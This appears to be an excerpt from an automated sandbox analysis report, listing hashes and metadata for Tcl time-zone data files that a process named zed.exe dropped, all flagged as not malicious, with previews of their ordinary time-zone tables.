                                                                                                                                                                                                                                            SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                                            SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                                            SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):251
                                                                                                                                                                                                                                            Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                                            MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                                            SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                                            SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                                            SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6745
                                                                                                                                                                                                                                            Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                                            SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                                            SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                                            SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2067
                                                                                                                                                                                                                                            Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                                            MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                                            SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                                            SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                                            SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                                            MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                                            SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                                            SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                                            SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                                                            Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                                            SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                                            SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                                            SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                                                            Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                                            MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                                            SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                                            SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                                            SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6705
                                                                                                                                                                                                                                            Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                                            SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                                            SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                                            SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2261
                                                                                                                                                                                                                                            Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                                            MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                                            SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                                            SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                                            SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7080
                                                                                                                                                                                                                                            Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                                            MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                                            SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                                            SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                                            SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10507
                                                                                                                                                                                                                                            Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                                            MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                                            SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                                            SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                                            SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                                                            Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                                            MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                                            SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                                            SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                                            SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2936
                                                                                                                                                                                                                                            Entropy (8bit):3.6410670126139046
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                                            MD5:D78DEBC7C0B15B31635DDC34C49248BC
                                                                                                                                                                                                                                            SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                                            SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                                            SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                                            MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                                            SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                                            SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                                            SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                                            MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                                            SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                                            SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                                            SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                                            MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                                            SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                                            SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                                            SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                                            Malicious:false
